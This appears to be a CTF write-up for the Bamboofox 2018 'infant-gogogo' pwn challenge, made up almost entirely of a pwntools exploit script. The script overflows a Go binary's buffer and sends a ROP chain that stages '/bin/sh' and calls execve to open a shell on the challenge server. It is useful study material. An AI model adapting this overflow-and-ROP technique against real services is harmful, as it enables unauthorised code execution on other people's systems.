# Bamboofox/2018/infant-gogogo [250]
###### tags: `CTF`,`PWN`,`Bamboofox`,`writeup`
#
# Writeup note (translated from the original): this is a Go-binary pwn
# challenge. After 0x100 bytes of input the saved return address is
# overwritten; NX is enabled, so the solution is a ROP chain rather than
# injected code. Every address below is specific to this one binary and the
# chain only works because it can rely on fixed (non-PIE) addresses.
from pwn import *

context.arch = "amd64"

# Run-mode switches the original author flipped by hand.
local = False   # run the binary locally instead of connecting to the server
debug = False   # turn on pwntools debug logging
gdb1 = False    # attach gdb to the local process

if debug:
    context.log_level = "debug"

if local:
    p = process("./infant-gogogo")
    elf1 = ELF("././infant-gogogo")  # loaded for reference; not used below
    if gdb1:
        gdb.attach(p)
else:
    p = remote("bamboofox.cs.nctu.edu.tw", 58795)

p.recvuntil("Give me your text :")

# Gadgets found in the challenge binary.
gadget_pop_rax = 0x404656
gadget_pop_rdi = 0x485abd       # original note: rax must hold a writeable address
scratch = 0x54ed00              # writeable area used to stage the command string
gadget_mov_rdi_rax = 0x4518ff   # presumably writes rax to [rdi] (named move_rdi_rax originally)
gadget_pop_rsi = 0x408437       # original note: rax must hold a writeable address
gadget_pop_rdx = 0x44ecf2
gadget_syscall = 0x40d684

# Chain: keep rax pointing at writeable memory while the pop-rdi / pop-rsi
# gadgets run, store "/bin/sh\x00" at `scratch`, then set up
# rax=0x3b (execve), rdi=scratch, rsi=0, rdx=0 and enter the syscall.
rop_chain = b"".join([
    p64(gadget_pop_rax), p64(scratch),
    p64(gadget_pop_rdi), p64(scratch),
    p64(gadget_pop_rax), b"/bin/sh\x00",
    p64(gadget_mov_rdi_rax),
    p64(gadget_pop_rax), p64(scratch),
    p64(gadget_pop_rsi), p64(0),
    p64(gadget_pop_rdx), p64(0),
    p64(gadget_pop_rax), p64(0x3b),
    p64(gadget_syscall),
])

# 0x100 filler bytes reach the saved return address (see the note at the top).
p.sendline(b"a" * 0x100 + rop_chain)
p.sendline("cat /home/ctf/flag")
p.interactive()